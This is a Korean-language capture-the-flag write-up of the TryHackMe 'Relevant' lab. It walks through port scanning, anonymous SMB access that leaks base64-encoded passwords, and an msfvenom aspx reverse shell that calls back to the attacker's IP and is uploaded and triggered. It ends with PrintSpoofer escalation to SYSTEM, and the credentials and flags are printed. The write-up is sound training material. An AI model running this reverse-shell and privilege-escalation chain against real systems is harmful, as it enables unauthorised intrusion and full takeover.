포트스캐닝을 진행 .
모든포트 -p-
스캐닝 속도 -T4 (젤빠른것에서 두번째 속도. 하지만 그만큼 패킷은 많이 발생)
응답없을 시 시도는 두번 --max-retries=2
결과는 relevant_nmap_all_port.txt에 저장하였다.
http, smb(139,445)가 열려있고 unknown 포트 3개가 활성화되어있다.
$nmap -p- -T4 --max-retries=2 -oN relevant_nmap_allport.txt 10.10.43.248
Nmap scan report for 10.10.43.248
Host is up (0.30s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49663/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
제일먼저 smbclient -L 로 대상 서버에 존재하는 공유폴터들을 확인하였다.
$smbclient -L 10.10.43.248
Enter WORKGROUP\revi1337's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nt4wrksv Disk
SMB1 disabled -- no workgroup available
또한, 각 폴더들이 익명의 연결을 허용하는지 시도하였고, "nt4rwrksv" 폴더가 익명연결을 허용하여 접속하였고 passwords.txt 파일을 로컬로 받았다.
$smbclient //10.10.43.248/nt4wrksv
Enter WORKGROUP\revi1337's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Aug 22 19:05:43 2022
.. D 0 Mon Aug 22 19:05:43 2022
passwords.txt A 98 Sun Jul 26 00:15:33 2020
7735807 blocks of size 4096. 5135667 blocks available
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
파이프( | ) 를 기점으로 명령어의 결과들을 매개변수 넘겨 base64 로 디코딩한 값을 user_pass.txt 파일로 저장하였다.
Bob 과 Bill의 id, passwd 를 얻었다.
$cat passwords.txt | tail -2 | xargs -I argv bash -c '{ echo argv | base64 -d; }' > user_pass.txt
base64: invalid input
┌─[✗]─[revi1337@ParrotSec]─[~/Try-Hack_me/offensive_pentesting/advanced_exploitation/relevant]
└──╼ $cat user_pass.txt
Bob - !P@$$W0rD!123Bill - Juw4nnaM4n420696969!$$$
얻은 Bob과 BIll의 Credential로 rdp에도 로그인해고 각 공유폴더들에게도 계속 로그인을 시도했지만 접근조차 되지않았다. 따라서 smb에 알력진 취약점이 있는지 nmap NSE로 취약점 스캐닝을 진행하였다.
ㅋㅋㅋ굉장히 자주쓰이는 EternalBlue 취약점이 나왔다. 이것을 활용해보자
$sudo nmap -p 139,445 10.10.43.248 --script=smb-vuln* -oN relevant_smb_vuln.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-22 19:15 KST
Nmap scan report for 10.10.69.92
Host is up (0.30s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 16.73 seconds
Tryhackme에서 MetaSploit은 쓰지말래서 Searchsploit로 POC 코드를 검색하여 취약점을 이용해보려 했지만
계속 실패하였다. 그래서 다른 방법을 시도했다.(문제에서 Metasploit을 쓰지말고 여러가지 취약점을 활용하라 했다.)
$searchsploit ms17-010
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010) | windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | windows/dos/41891.rb
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/42030.py
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/41987.py
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
$searchsploit -m 41987
Exploit: Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)
URL: https://www.exploit-db.com/exploits/41987
Path: /usr/share/exploitdb/exploits/windows_x86-64/remote/41987.py
File Type: Python script, ASCII text executable, with very long lines
Copied to: /home/revi1337/Try-Hack_me/offensive_pentesting/advanced_exploitation/relevant/41987.py
진전이 없어 굉장히 고민해본 끝에 제일처음 전체포트 스캐닝을 했을때 Unknown 포트 3개가 있어서 이것을 이용해보았다. http의 80포트와 Unknown 49663 포트가 똑같이 웹서버가 돌아가는것을 대충 느낌이왔다.
$ curl http://10.10.43.248
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS Windows Server</title>
<style type="text/css">
<!--
body {
color:#000000;
background-color:#0072C6;
margin:0;
}
#container {
.... 생략
$curl http://10.10.43.248:49663
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS Windows Server</title>
<style type="text/css">
<!--
body {
color:#000000;
background-color:#0072C6;
margin:0;
}
#container {
... 생략
80포트와 49663포트 의 응답 모두 같은 것을 보아 49663포트를사용하는 웹서버에서 smb공유폴더에 접근할수 있다는것을 눈치채었다.
$curl http://10.10.43.248:49663 -v | tee 49663.txt
$curl http://10.10.43.248 -v | tee 80.txt
$diff 80.txt 49663.txt
이제 80번포트에서 서비스되는 웹서버와 49663포트에서 서비스는되는 웹서버의 차이점을 보자.
일반적인 80포트에서 공유폴더에있는 psswords.txt에 대한 응답이 404인것을 보면 접근할수없었다.
하지만 49663 포트에서는 200 코드가 응답되었고 초반에 로컬에 받았던 passwords.txt 파일이 있는 것을 확인하였다.
$curl http://10.10.43.248/nt4wrksv/passwords.txt -v
* Trying 10.10.43.248:80...
* Connected to 10.10.43.248 (10.10.43.248) port 80 (#0)
> GET /nt4wrksv/passwords.txt HTTP/1.1
> Host: 10.10.43.248
> User-Agent: curl/7.84.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 404 Not Found
< Server: Microsoft-IIS/10.0
< X-Powered-By: ASP.NET
< Date: Mon, 22 Aug 2022 11:17:26 GMT
< Content-Length: 0
<
* Connection #0 to host 10.10.43.248 left intact
$curl http://10.10.43.248:49663/nt4wrksv/passwords.txt -v
* Trying 10.10.43.248:49663...
* Connected to 10.10.43.248 (10.10.43.248) port 49663 (#0)
> GET /nt4wrksv/passwords.txt HTTP/1.1
> Host: 10.10.43.248:49663
> User-Agent: curl/7.84.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Content-Type: text/plain
< Last-Modified: Sat, 25 Jul 2020 15:15:33 GMT
< Accept-Ranges: bytes
< ETag: "65e151719662d61:0"
< Server: Microsoft-IIS/10.0
< X-Powered-By: ASP.NET
< Date: Mon, 22 Aug 2022 11:17:36 GMT
< Content-Length: 98
<
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
* Connection #0 to host 10.10.43.248 left intact
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
smb 공유폴더에 리버스쉘코드를 업로드시켜놓고 웹에서 접근하면 성공적으로 쉘을 연결시킬수 있다.
msfvenom으로 aspx 포맷으로 리버스 쉘코드를 생성하였다, 확장자가 aspx인 이유는 curl에서도 계속보이지만 웹서버가 IIS여서 그렇다
$msfvenom -p windows/x64/shell_reverse_tcp lhost=10.11.71.183 lport=9999 -f aspx -o rvshell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3413 bytes
Saved as: rvshell.aspx
$file rvshell.aspx
rvshell.aspx: HTML document, ASCII text
썡뚱맞지만 http에서 upload가 허용되나 확인해보았지만 허용되지않았고 평범하게 다시 공유폴더에 접근해서 리버스쉘코드를 업로드시켜주었다.
$curl -X OPTIONS http://10.10.43.248:49663/nt4wrksv/ -v
* Trying 10.10.43.248:49663...
* Connected to 10.10.43.248 (10.10.43.248) port 49663 (#0)
> OPTIONS /nt4wrksv/ HTTP/1.1
> Host: 10.10.43.248:49663
> User-Agent: curl/7.84.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Allow: OPTIONS, TRACE, GET, HEAD, POST
< Server: Microsoft-IIS/10.0
< Public: OPTIONS, TRACE, GET, HEAD, POST
< X-Powered-By: ASP.NET
< Date: Mon, 22 Aug 2022 11:27:13 GMT
< Content-Length: 0
<
* Connection #0 to host 10.10.43.248 left intact$smbclient //10.10.43.248/nt4wrksv
Enter WORKGROUP\revi1337's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jul 26 06:46:04 2020
.. D 0 Sun Jul 26 06:46:04 2020
passwords.txt A 98 Sun Jul 26 00:15:33 2020
7735807 blocks of size 4096. 5137355 blocks available
smb: \> put rvshell.aspx
putting file rvshell.aspx as \rvshell.aspx (3.7 kb/s) (average 3.7 kb/s)
smb: \> ls
. D 0 Mon Aug 22 20:28:05 2022
.. D 0 Mon Aug 22 20:28:05 2022
passwords.txt A 98 Sun Jul 26 00:15:33 2020
rvshell.aspx A 3413 Mon Aug 22 20:28:06 2022
7735807 blocks of size 4096. 5137354 blocks available
smb: \>
업로드시켰으니 로컬에서 10.11.71.183로 들어오는 요청을 기다리고
$nc -s 10.11.71.183 -nlvp 9999
listening on [10.11.71.183] 9000 ...
curl로 리버스쉘코드가 업로드된 파일에 접근하면
$curl http://10.10.43.248:49663/nt4wrksv/rvshell.aspx
nc 로 웹서버의 쉘이 붙는것을 확인할 수 있다. 이제 여기서 권한상승이 필요하다. IIS 실행하는 사용자의 권한은 굉장히 낮기 때문에 Local Privilege Escalation이 필요하다.
$nc -s 10.11.71.183 -nlvp 9999
listening on [10.11.71.183] 9999 ...
connect to [10.11.71.183] from (UNKNOWN) [10.10.43.248] 49886
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
c:\windows\system32\inetsrv>
현재 iis 가 갖고있는 권한중 seImpersonatePrivilege 권한이 설정되어있다면 PrintSpoofer.exe 라는 도구를 사용하여SYstem계정으로 권한상승 시킬 수 있다.
git에 있는 PrintSpoofer.exe를 로컬에 받은 후
$wget https://github.com/dievus/printspoofer/raw/master/PrintSpoofer.exe
--2022-08-22 21:48:21-- https://github.com/dievus/printspoofer/raw/master/PrintSpoofer.exe
Resolving github.com (github.com)... 20.200.245.247
Connecting to github.com (github.com)|20.200.245.247|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/dievus/printspoofer/master/PrintSpoofer.exe [following]
--2022-08-22 21:48:22-- https://raw.githubusercontent.com/dievus/printspoofer/master/PrintSpoofer.exe
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.111.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27136 (26K) [application/octet-stream]
Saving to: ‘PrintSpoofer.exe’
PrintSpoofer.exe 100%[=====================================================================================================>] 26.50K --.-KB/s in 0.008s
2022-08-22 21:48:23 (3.07 MB/s) - ‘PrintSpoofer.exe’ saved [27136/27136]
$file PrintSpoofer.exe
PrintSpoofer.exe: PE32+ executable (console) x86-64, for MS Windows
다시 smb공유폴더에서 접속해서 PrintSpoofer.exe 을 업로드시켜주자
$smbclient //10.10.93.17/nt4wrksv
smb: \> put PrintSpoofer.exe
putting file PrintSpoofer.exe as \PrintSpoofer.exe (22.2 kb/s) (average 14.3 kb/s)
마지막으로 PrintSpoofer.exe를 실행시켜주면 권한상승시켜줄 수 있다.
c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
User와 Root 플래그 확인
C:\Users\Bob\Desktop>type user.txt
type user.txt
THM{fdk4ka34vk346ksxfr21tg789ktf45}
C:\Users\Administrator\Desktop>type root.txt
type root.txt
THM{1fk5kf469devly1gl320zafgl345pv}
